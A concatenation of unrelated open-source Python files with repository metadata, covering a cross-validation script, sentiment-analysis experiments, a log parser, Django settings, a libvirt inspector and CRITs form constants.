@click.option("--location", "-l", type=str, default=None)
@click.option("--n_splits", "-n", type=int, default=5)
def main(location, n_splits):
logger = logging.getLogger(__name__)
logger.info('#0: separating cross-validation index')
#
# generate index used in cross-validation trials
#
splitter = ValidationSplitHandler()
if location is None:
location_list = LOCATIONS
else:
location_list = [location, ]
for place in location_list:
train_filepath_prefix = path.join(
PROJECT_ROOT_DIRPATH, "data/processed/dataset.train_X_y"
)
splitter.separate_and_serialize_validation_index(
train_filepath_prefix, place, n_splits
)
logger.info('#1: get cross-validation test index @ {l}'.format(l=place))
logger.info('#1: end separating the cross-validation index')
if __name__ == '__main__':
log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
# find .env automagically by walking up directories until it's found, then
# load up the .env entries as environment variables
load_dotenv(find_dotenv())
main()
|
{
"content_hash": "17d96cc95c99d28d0d03cb3de1d06a52",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 81,
"avg_line_length": 28.107692307692307,
"alnum_prop": 0.6759715380405036,
"repo_name": "gciteam6/xgboost",
"id": "ee37f1c7f447fc33e87f0646a8f8d9a12548b3a9",
"size": "1846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/models/separate_validation_index.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "61501"
},
{
"name": "Makefile",
"bytes": "4545"
},
{
"name": "Python",
"bytes": "91012"
},
{
"name": "Shell",
"bytes": "3054"
}
],
"symlink_target": ""
}
|
__author__ = 'Lukasz Augustyniak'
import logging
from datetime import datetime
from pprint import pprint
from sklearn.linear_model import LogisticRegression
from textlytics.sentiment.sentiment import Sentiment
from textlytics.sentiment.io_sentiment import results_to_pickle
log = logging.getLogger(__name__)
ALL_CLASSIFIERS = {
# 'BernoulliNB': BernoulliNB(),
# 'GaussianNB': GaussianNB(),
# 'MultinomialNB': MultinomialNB(),
# 'DecisionTreeClassifier': DecisionTreeClassifier(),
# 'RandomForestClassifier': RandomForestClassifier(),
'LogisticRegression': LogisticRegression(),
# 'LinearSVC': LinearSVC(),
# 'Perceptron': Perceptron(),
# 'SVC': SVC(),
# 'AdaBoostClassifier': AdaBoostClassifier(),
# 'SVR': SVR(),
# 'NuSVC': NuSVC(),
# 'NuSVR': NuSVR(),
# 'OneClassSVM': OneClassSVM(),
# 'ExtraTreeClassifier': ExtraTreeClassifier()
}
def test_ensemble(dataset, source):
# ############################# LEXICONS ##################################
# dictionary for all predicted values
lexicons_predictions = {}
sentiment = Sentiment()
print datetime.now()
# lexicons_files = [
# 'AFINN-96.txt',
# 'AFINN-111.txt',
# # 'amazon_movies_25.txt',
# 'Bing-Liu.txt',
# 'enchantedlearning.com.txt',
# 'past_future_list.txt',
# 'past_future_list_plus.txt',
# 'simple_list.txt',
# 'simple_list_plus.txt',
# 'simplest.txt'
# ]
#
# category_lexicons = [
# 'amazon_automotive_5.txt',
# 'amazon_automotive_25.txt',
# 'amazon_books_5.txt',
# 'amazon_books_25.txt',
# 'amazon_electronics_5.txt',
# 'amazon_electronics_25.txt',
# 'amazon_health_5.txt',
# 'amazon_health_25.txt',
# 'amazon_movies_5.txt']
#
# for cl in category_lexicons:
# if cl.split('_')[1] in dataset.lower():
# lexicons_files.append(cl)
# print cl
# df, lexicon_prediction, lexicon_result, classes = \
# sentiment.lexicon_based_sentiment(
# f_name=dataset,
# sentiment_level='Document',
# lexicons_files=lexicons_files,
# words_stem=False)
# lexicons_predictions.update(lexicon_prediction)
# to_pickle(dataset, 'predictions', lexicon_prediction)
# to_pickle(dataset, 'lexicons', lexicon_result)
# pprint(lexicon_result)
# ############################# ENSEMBLE LEXICONS #########################
# ensemble_lexicons = SentimentEnsemble(classes=classes)
# ensemble_results = ensemble_lexicons.sentiment_ensemble_lexi_ml(
# lexicon_predictions=lexicons_predictions,
# ml_predictions={},
# classifiers=ALL_CLASSIFIERS,
# n_folds=2
# )
# to_pickle(dataset, 'ensemble-lexicons-only', ensemble_results)
# ############################# features_ngrams ############################
# all n grams to test
features_ngrams = {
'unigrams': (1, 1),
'bigrams': (2, 2),
# 'trigrams': (3, 3),
'n_grams_1_2': (1, 2),
'n_grams_1_3': (1, 3),
# 'n_grams_2_3': (2, 3)
}
logging.info(features_ngrams)
# dictionary for machine learning predictions (part of feature set for
# second step in ensemble approach)
ml_predictions = {}
############################# TfidfVectorizer ############################
# for n_gram_name, n_grams_range in features_ngrams.iteritems():
# print n_gram_name
# print 'TfidfVectorizer'
# f_name = n_gram_name + '_TfidfVectorizer'
# classes, ml_prediction, results_ml = sentiment.machine_learning_sentiment(
# file_name=dataset,
# worksheet_name='Arkusz1',
# n_gram_range=n_grams_range,
# n_folds=10,
# classifiers=ALL_CLASSIFIERS,
# # classifiers={'GaussianNB': GaussianNB()},
# # classifiers=None, # all classifier available in sentiment class
# amazon=True,
# lowercase=True,
# stop_words='english',
# max_df=1.0,
# min_df=0.0,
# max_features=None,
# results_filename=f_name,
# vectorizer='TfidfVectorizer',
# # tokenizer=document_preprocessor.tokenizer_with_stemming
# )
# # add all prediction dictionaries into feature set
# ml_predictions.update(ml_prediction)
# to_pickle(dataset, n_gram_name + '-' + f_name, results_ml)
# ############################# CountVectorizer ############################
for n_gram_name, n_grams_range in features_ngrams.iteritems():
print n_gram_name
print 'CountVectorizer'
f_name = n_gram_name + '_CountVectorizer'
classes, ml_prediction, results_ml = sentiment.supervised_sentiment(
dataset=dataset,
# worksheet_name='Arkusz1',
n_gram_range=n_grams_range,
n_folds=10,
# classifiers={'GaussianNB': GaussianNB()},
# classifiers=None, # all classifier available in sentiment class
classifiers=ALL_CLASSIFIERS,
# amazon=True,
lowercase=True,
stop_words='english',
max_df=1.0,
min_df=0.0,
max_features=None,
f_name_results=f_name,
vectorizer='CountVectorizer',
# tokenizer=document_preprocessor.tokenizer_with_stemming
source=source
)
ml_predictions.update(ml_prediction)
results_to_pickle(source, n_gram_name + '-' + f_name, results_ml)
pprint(results_ml['measures']['LogisticRegression']['f1-avg'])
pprint(results_ml['measures']['LogisticRegression']['acc-avg'])
# pprint(results_ml['measures']['SVC']['f1-avg'])
# pprint(lexicons_predictions)
# pprint(ml_predictions)
# ############################# ENSEMBLE ###################################
# ensemble = SentimentEnsemble(classes=classes)
# ensemble_results = ensemble.sentiment_ensemble_lexi_ml(
# lexicon_predictions=lexicons_predictions,
# ml_predictions=ml_predictions,
# classifiers=ALL_CLASSIFIERS,
# n_folds=10
# )
# to_pickle(dataset, 'ensemble', ensemble_results)
# ############################# OTHER ######################################
# sentiment.machine_learning_sentiment(
# file_name='Amazon-500x150-balanced.xlsx',
# worksheet_name='Arkusz1',
# n_gram_range=(1, 3),
# # classifiers={'GaussianNB': GaussianNB()},
# # classifiers={},
# amazon=True)
#
# sentiment.machine_learning_sentiment(
# file_name='Amazon-500x150-balanced.xlsx',
# worksheet_name='Arkusz1',
# n_gram_range=(1, 2),
# classifiers={'GaussianNB': GaussianNB()},
# # classifiers={},
# amazon_dataset=True)
#
# sentiment.machine_learning_sentiment(
# file_name='Amazon-500x150-balanced.xlsx',
# worksheet_name='Arkusz1',
# n_gram_range=(1, 1),
# classifiers={'GaussianNB': GaussianNB()},
# # classifiers={},
# amazon_dataset=True)
#
# # tylko pozytywne i negatywne
# sentiment.machine_learning_sentiment(
# file_name=path.join('Amazon-4k-pos-neg.xls'),
# # file_name=path.join('Amazon-500x150-balanced.xlsx'),
# worksheet_name='Arkusz1',
# # classifiers={'GaussianNB': GaussianNB()},
# classifiers={},
# amazon_dataset=True,
# progress_interval=3)
# ############################# TEST RUNNING ###################################
#
# parser = argparse.ArgumentParser()
# parser.add_argument("dataset", help="path to dataset file")
# args = parser.parse_args()
# test_ensemble(dataset=args.dataset)
test_ensemble(dataset='C:/Datasets/semeval/2013/semeval-2013.csv', source='semeval2013')
# test_ensemble(dataset='Amazon-500x150-balanced.xlsx')
# test_ensemble(dataset='Automotive9600.csv')
# test_ensemble(dataset='Books9600.csv')
# test_ensemble(dataset='Health & Personal Care9600.csv')
# test_ensemble(dataset='Movies & TV9600.csv')
# test_ensemble(dataset='Movies & TV3200.csv')
# test_ensemble(dataset='Movies_&_TV1200.csv')
# test_ensemble(dataset='Movies & TV-1-3-5-x-1000.csv')
# test_ensemble(dataset='Music9600.csv')
# test_ensemble(dataset='semeval2013.csv', source='semeval2013')
# test_ensemble(dataset='semeval2014.csv', source='semeval2014')
# test_ensemble(dataset='Automotive200.csv', source='amazon')
# test_ensemble(dataset='Amazon-7.xlsx')
# test_ensemble()
|
{
"content_hash": "98fa79b9486c9cd93148413ea811eb8a",
"timestamp": "",
"source": "github",
"line_count": 235,
"max_line_length": 88,
"avg_line_length": 37.05106382978723,
"alnum_prop": 0.5704605489835765,
"repo_name": "laugustyniak/textlytics",
"id": "c12a76ca1ad35bc2d3df0a7847f5c7c862ef6271",
"size": "8731",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/sentiment_superv.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "199403"
},
{
"name": "Shell",
"bytes": "292"
}
],
"symlink_target": ""
}
|
from zeit.cms.i18n import MessageFactory as _
import zeit.cms.browser.menu
import zeit.cms.browser.view
import zeit.cms.repository.interfaces
import zeit.connector.interfaces
import zope.event
class Reload(zeit.cms.browser.view.Base):
"""Reload folder (invalidate cache)."""
def __call__(self):
zope.event.notify(
zeit.connector.interfaces.ResourceInvaliatedEvent(
self.context.uniqueId))
zope.event.notify(
zeit.cms.repository.interfaces.ObjectReloadedEvent(self.context))
self.redirect(self.url(self.context, '@@view.html'))
return ''
class MenuItem(zeit.cms.browser.menu.ActionMenuItem):
"""Delete menu item."""
title = _('Reload folder')
|
{
"content_hash": "63ed79ff73f73e823da3954736b26156",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 77,
"avg_line_length": 29.44,
"alnum_prop": 0.686141304347826,
"repo_name": "ZeitOnline/zeit.cms",
"id": "b68553158e9ccd5e1d36a9d60f09cc130d9b9055",
"size": "736",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/zeit/cms/repository/browser/reload.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "45467"
},
{
"name": "HTML",
"bytes": "10561"
},
{
"name": "JavaScript",
"bytes": "152481"
},
{
"name": "Python",
"bytes": "920274"
},
{
"name": "Shell",
"bytes": "374"
}
],
"symlink_target": ""
}
|
import re
re_begin = re.compile('download begin \\d+')
re_end = re.compile('Loading complete\\. .+ sec \\d+ bytes')
re_buffer = re.compile('buffer = .+, bufferTime = .+')
re_play_quality = re.compile('swicth to index \\d')
re_quality = re.compile('quality=\\d+')
re_bw = re.compile('Bandwidth .+ kbps')
re_newone = re.compile("(\\{\\{\\{\\{\\{\\}\\}\\}\\}\\})|(QoSInfo)|(Ideal bitrate)|(=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=)")
def parse(s, add_bw_metric=False):
if re_begin.search(s):
return begin_parse(re_begin.search(s).group(0))
elif re_end.search(s):
return end_parse(re_end.search(s).group(0))
elif re_buffer.search(s):
return buffer_parse(re_buffer.search(s).group(0))
elif re_play_quality.search(s):
return switch_parse(re_play_quality.search(s).group(0))
elif re_quality.search(s):
return f4fhandler_parse(re_quality.search(s).group(0))
elif add_bw_metric and re_bw.search(s):
return bw_parse(re_bw.search(s).group(0))
elif re_newone.search(s):
pass
else:
print s
raise('invalid message format')
def begin_parse(s):
bitrate = int(s.replace('download begin ', ''))
result = {
0: 0,
1: 1,
2: 2,
3: 3,
4: 4
}[bitrate]
return [1, 0, result, 0]
def end_parse(s):
re_ = re.compile('Loading complete\\. .+ sec')
if re_.search(s):
# when replacing, strip the \\
time = float(re_.search(s).group(0).replace('Loading complete. ', '')\
.replace(' sec', ''))
else:
raise ('invalid downloading completed')
re__ = re.compile('sec \\d+ bytes')
if re__.search(s):
size = float(re__.search(s).group(0).replace('sec ', '')\
.replace(' bytes', ''))
else:
raise ('invalid downloading size')
if time == 0:
time_ = time + 0.0005
flag = 1
else:
time_ = time
flag = 0
throughput = size/time_/1024
return [1, 1, time, size]
def buffer_parse(s):
s = s.split(',')
buffer_ = float(s[0].replace('buffer = ', ''))
buffer_time = float(s[1].replace('bufferTime = ', ''))
return [2, buffer_, buffer_time]
def switch_parse(s):
index = int(s.replace('swicth to index ', ''))
return [3, index]
def f4fhandler_parse(s):
index = int(s.replace('quality=', ''))
return [4, index]
def bw_parse(s):
bw = float(s.replace('Bandwidth ', '').replace(' kbps', ''))
return [5, bw]
if __name__ == "__main__":
print parse('download begin 0')
print parse('download begin 2')
print parse('Loading complete. 0.001 sec 458792 bytes.')
print parse('Loading complete. 0.013 sec 418063 bytes.')
print parse('buffer = 5.114, bufferTime = 4')
print parse('swicth to index 2')
print parse('Bandwidth 2421 kbps', True)
print parse('Bandwidth 3882.211 kbps', True)
print parse('[[[[[]]]]] size = 252554')
|
{
"content_hash": "2f1b2fef1098967f82ee57c663391b2e",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 164,
"avg_line_length": 31.357894736842105,
"alnum_prop": 0.5545485062101376,
"repo_name": "divergentdave/OSMF-log-parser",
"id": "2327f1f1cc304bd8629c8d313428abcc566718c8",
"size": "2979",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "msg_parser.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5225"
}
],
"symlink_target": ""
}
|
"""
A simple example that shows how shapes initially placed overlapping will
try to move so they are not overlapping. In this case we put too many
balls into a very small area and let them find their way out.
Note that we need to shift placement of the balls around a small area to
get uniform expansion when the simulation starts. Putting them all on the
exact same spot expands them only in a horizontal line.
The screencast developing this code can be found here:
http://youtu.be/F8qSSoBz_o8?hd=1
"""
from pyphysicssandbox import *
import random
window("A tiny volcano", 400, 400)
static_line((225, 400), (175, 400), 15).color=Color('grey')
static_line((225, 400), (225, 300), 15).color=Color('grey')
static_line((175, 300), (175, 400), 15).color=Color('grey')
static_line((220, 275), (225, 300), 15).color=Color('grey')
static_line((175, 300), (180, 275), 15).color=Color('grey')
# We have to spread the balls out a bit to get uniform expansion,
# otherwise they all expand horizontally.
for i in range(500):
ball1 = ball((200+random.randint(-1,1), 350+random.randint(-1,1)), 5)
#ball1.color = Color(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
ball1.color = Color('red')
run()
|
{
"content_hash": "446515a30b27590dcbbe4ca7ff58c824",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 96,
"avg_line_length": 36.23529411764706,
"alnum_prop": 0.7142857142857143,
"repo_name": "jshaffstall/PyPhysicsSandbox",
"id": "c307eebe3e6736e9d7c32f1c4606f99a111c4ef9",
"size": "1232",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/volcano.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "133098"
}
],
"symlink_target": ""
}
|
"""
Django settings for brumed project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'xs(1zpba3%vmm)re6z@i(v$c66rs4_r7m3*4@lu30zyq!=)ts@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'brumed.urls'
WSGI_APPLICATION = 'brumed.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
|
{
"content_hash": "72330e1a7d571631b6b9d29680c64e82",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 71,
"avg_line_length": 24.602409638554217,
"alnum_prop": 0.7257590597453477,
"repo_name": "josecostamartins/pythonreges",
"id": "22131003f46449b5c65492d37fba3847776f086e",
"size": "2042",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "brumed/brumed/brumed/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "671"
},
{
"name": "Python",
"bytes": "32164"
}
],
"symlink_target": ""
}
|
"""Implementation of Inspector abstraction for libvirt."""
from lxml import etree
from oslo.config import cfg
from ceilometer.compute.virt import inspector as virt_inspector
from ceilometer.openstack.common import log as logging
libvirt = None
LOG = logging.getLogger(__name__)
libvirt_opts = [
cfg.StrOpt('libvirt_type',
default='kvm',
help='Libvirt domain type (valid options are: '
'kvm, lxc, qemu, uml, xen)'),
cfg.StrOpt('libvirt_uri',
default='',
help='Override the default libvirt URI '
'(which is dependent on libvirt_type)'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_opts)
class LibvirtInspector(virt_inspector.Inspector):
per_type_uris = dict(uml='uml:///system', xen='xen:///', lxc='lxc:///')
def __init__(self):
self.uri = self._get_uri()
self.connection = None
def _get_uri(self):
return CONF.libvirt_uri or self.per_type_uris.get(CONF.libvirt_type,
'qemu:///system')
def _get_connection(self):
if not self.connection or not self._test_connection():
global libvirt
if libvirt is None:
libvirt = __import__('libvirt')
LOG.debug('Connecting to libvirt: %s', self.uri)
self.connection = libvirt.openReadOnly(self.uri)
return self.connection
def _test_connection(self):
try:
self.connection.getCapabilities()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() == libvirt.VIR_ERR_SYSTEM_ERROR and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
def _lookup_by_name(self, instance_name):
try:
return self._get_connection().lookupByName(instance_name)
except Exception as ex:
error_code = ex.get_error_code() if libvirt else 'unknown'
msg = ("Error from libvirt while looking up %(instance_name)s: "
"[Error Code %(error_code)s] %(ex)s" % locals())
raise virt_inspector.InstanceNotFoundException(msg)
def inspect_instances(self):
if self._get_connection().numOfDomains() > 0:
for domain_id in self._get_connection().listDomainsID():
try:
# We skip domains with ID 0 (hypervisors).
if domain_id != 0:
domain = self._get_connection().lookupByID(domain_id)
yield virt_inspector.Instance(name=domain.name(),
uuid=domain.UUIDString())
except libvirt.libvirtError:
# Instance was deleted while listing... ignore it
pass
def inspect_cpus(self, instance_name):
domain = self._lookup_by_name(instance_name)
(_, _, _, num_cpu, cpu_time) = domain.info()
return virt_inspector.CPUStats(number=num_cpu, time=cpu_time)
def inspect_vnics(self, instance_name):
domain = self._lookup_by_name(instance_name)
tree = etree.fromstring(domain.XMLDesc(0))
for iface in tree.findall('devices/interface'):
name = iface.find('target').get('dev')
mac = iface.find('mac').get('address')
fref = iface.find('filterref').get('filter')
params = dict((p.get('name').lower(), p.get('value'))
for p in iface.findall('filterref/parameter'))
interface = virt_inspector.Interface(name=name, mac=mac,
fref=fref, parameters=params)
rx_bytes, rx_packets, _, _, \
tx_bytes, tx_packets, _, _ = domain.interfaceStats(name)
stats = virt_inspector.InterfaceStats(rx_bytes=rx_bytes,
rx_packets=rx_packets,
tx_bytes=tx_bytes,
tx_packets=tx_packets)
yield (interface, stats)
def inspect_disks(self, instance_name):
domain = self._lookup_by_name(instance_name)
tree = etree.fromstring(domain.XMLDesc(0))
for device in filter(
bool,
[target.get("dev")
for target in tree.findall('devices/disk/target')]):
disk = virt_inspector.Disk(device=device)
block_stats = domain.blockStats(device)
stats = virt_inspector.DiskStats(read_requests=block_stats[0],
read_bytes=block_stats[1],
write_requests=block_stats[2],
write_bytes=block_stats[3],
errors=block_stats[4])
yield (disk, stats)
|
{
"content_hash": "8d8d8d5f421f8379ac9fca7b51038465",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 79,
"avg_line_length": 41.6910569105691,
"alnum_prop": 0.5273010920436817,
"repo_name": "dreamhost/ceilometer",
"id": "f5881659b93268d7c511e48f9f4c09b46d878968",
"size": "5781",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ceilometer/compute/virt/libvirt/inspector.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "368517"
},
{
"name": "Python",
"bytes": "993129"
}
],
"symlink_target": ""
}
|
class Common():
ADD_INDICATOR = "Add Indicator?"
BUCKET_LIST = "Bucket List"
CAMPAIGN = "Campaign"
CAMPAIGN_CONFIDENCE = "Campaign Confidence"
OBJECTS_DATA = "Objects Data"
SOURCE = "Source"
SOURCE_REFERENCE = "Source Reference"
SOURCE_METHOD = "Source Method"
TICKET = "Ticket"
CLASS_ATTRIBUTE = "class"
BULK_SKIP = "bulkskip"
BULK_REQUIRED = "bulkrequired"
# class names
Actor = "Actor"
Backdoor = "Backdoor"
Campaign = "Campaign"
Certificate = "Certificate"
Domain = "Domain"
Email = "Email"
Event = "Event"
Exploit = "Exploit"
Indicator = "Indicator"
IP = "IP"
Object = "Object"
PCAP = "PCAP"
RawData = "RawData"
Sample = "Sample"
Target = "Target"
BUCKET_LIST_VARIABLE_NAME = "bucket_list"
TICKET_VARIABLE_NAME = "ticket"
class Status():
"""
Status fields/enumerations used in bulk upload.
"""
STATUS_FIELD = "status";
FAILURE = 0;
SUCCESS = 1;
DUPLICATE = 2;
class Actor():
"""
Constants for Actors.
"""
NAME = "Name"
ALIASES = "Aliases"
DESCRIPTION = "Description"
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
SOURCE = Common.SOURCE
SOURCE_METHOD = "Source Method"
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class Backdoor():
"""
Constants for Backdoors.
"""
NAME = "Backdoor name"
ALIASES = "Aliases"
DESCRIPTION = "Description"
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
VERSION = "Version"
SOURCE = Common.SOURCE
SOURCE_METHOD = "Source Method"
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class Exploit():
"""
Constants for Exploits.
"""
NAME = "Name"
DESCRIPTION = "Description"
CVE = "CVE"
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
VERSION = "Version"
SOURCE = Common.SOURCE
SOURCE_METHOD = "Source Method"
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class Campaign():
"""
Constants for Campaigns.
"""
NAME = "Name"
class Certificate():
"""
Constants for Certificates.
"""
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class IP():
"""
Constants for IPs.
"""
IP_ADDRESS = "IP Address"
IP_TYPE = "IP Type"
ANALYST = "Analyst"
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
ADD_INDICATOR = Common.ADD_INDICATOR
INDICATOR_REFERENCE = "Indicator Reference"
IP_DATE = "IP Date"
IP_SOURCE = "IP Source"
IP_METHOD = "IP Source Method"
IP_REFERENCE = "IP Source Reference"
CACHED_RESULTS = "ip_cached_results"
class Domain():
"""
Constants for Domains.
"""
DOMAIN_NAME = "Domain Name"
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
DOMAIN_SOURCE = Common.SOURCE
DOMAIN_METHOD = Common.SOURCE_METHOD
DOMAIN_REFERENCE = Common.SOURCE_REFERENCE
ADD_IP_ADDRESS = "Add IP Address?"
IP_ADDRESS = IP.IP_ADDRESS
IP_TYPE = IP.IP_TYPE
IP_DATE = IP.IP_DATE
SAME_SOURCE = "Use Domain Source"
IP_SOURCE = IP.IP_SOURCE
IP_METHOD = IP.IP_METHOD
IP_REFERENCE = IP.IP_REFERENCE
ADD_INDICATORS = "Add Indicator(s)?"
CACHED_RESULTS = "domain_cached_results"
class Email():
"""
Constants for Emails.
"""
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class Event():
"""
Constants for Events.
"""
TITLE = "Title"
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class Indicator():
"""
Constants for Indicators.
"""
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class NotificationType():
ALERT = 'alert'
ERROR = 'error'
INFORMATION = 'information'
NOTIFICATION = 'notification'
SUCCESS = 'success'
WARNING = 'warning'
ALL = [ALERT, ERROR, INFORMATION, NOTIFICATION, SUCCESS, WARNING]
class Object():
"""
Constants for Objects.
"""
OBJECT_TYPE_INDEX = 0
VALUE_INDEX = 1
SOURCE_INDEX = 2
METHOD_INDEX = 3
REFERENCE_INDEX = 4
ADD_INDICATOR_INDEX = 5
OBJECT_TYPE = "Object Type"
VALUE = "Value"
SOURCE = Common.SOURCE
METHOD = "Method"
REFERENCE = "Reference"
PARENT_OBJECT_TYPE = "Otype"
PARENT_OBJECT_ID = "Oid"
ADD_INDICATOR = Common.ADD_INDICATOR
class PCAP():
"""
Constants for PCAPs.
"""
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class RawData():
"""
Constants for RawData.
"""
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class Sample():
"""
Constants for Samples.
"""
BUCKET_LIST = Common.BUCKET_LIST
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
EMAIL_RESULTS = "Email Me Results"
FILE_DATA = "File Data"
FILE_FORMAT = "File Format"
FILE_NAME = "File Name"
INHERIT_CAMPAIGNS = "Inherit Campaigns?"
INHERIT_SOURCES = "Inherit Sources?"
MD5 = "MD5"
RELATED_MD5 = "Related MD5"
PASSWORD = "Password"
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
UPLOAD_TYPE = "Upload Type"
CACHED_RESULTS = "sample_cached_results"
class UploadType():
FILE_UPLOAD = "File Upload"
METADATA_UPLOAD = "Metadata Upload"
class Target():
"""
Constants for Targets.
"""
TITLE = "Title"
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
def get_source_field_for_class(otype):
"""
Based on the CRITs type, get the source field constant.
:param otype: The CRITs type.
:type otype: str.
:returns: str
"""
class_to_source_field_map = {
Common.Certificate: Certificate.SOURCE,
Common.Domain: Domain.DOMAIN_SOURCE,
Common.Email: Email.SOURCE,
Common.Event: Event.SOURCE,
Common.Indicator: Indicator.SOURCE,
Common.IP: IP.SOURCE,
Common.Object: Object.SOURCE,
Common.PCAP: PCAP.SOURCE,
Common.RawData: RawData.SOURCE,
Common.Sample: Sample.SOURCE
}
return class_to_source_field_map.get(otype)
|
{
"content_hash": "ff09cff3acc19722d024720770a2a19f",
"timestamp": "",
"source": "github",
"line_count": 304,
"max_line_length": 69,
"avg_line_length": 22.223684210526315,
"alnum_prop": 0.6358792184724689,
"repo_name": "blaquee/crits",
"id": "5a3c51c49e1421a5662c106c5e1b885c5672bb21",
"size": "6756",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "crits/core/form_consts.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "8694"
},
{
"name": "CSS",
"bytes": "391710"
},
{
"name": "HTML",
"bytes": "456073"
},
{
"name": "JavaScript",
"bytes": "3486649"
},
{
"name": "Python",
"bytes": "1863769"
},
{
"name": "SaltStack",
"bytes": "2981"
},
{
"name": "Shell",
"bytes": "10871"
}
],
"symlink_target": ""
}
|
from django.contrib import admin
from notifications.models import Notification
from notifications.models import NotificationPreference
from notifications.models import NotificationType
class NotificationAdmin(admin.ModelAdmin):
list_display = ('actor', 'type', 'recipient', 'seen')
class NotificationPreferenceAdmin(admin.ModelAdmin):
list_display = ('user', 'notification_type', 'subscription_status')
class NotificationTypeAdmin(admin.ModelAdmin):
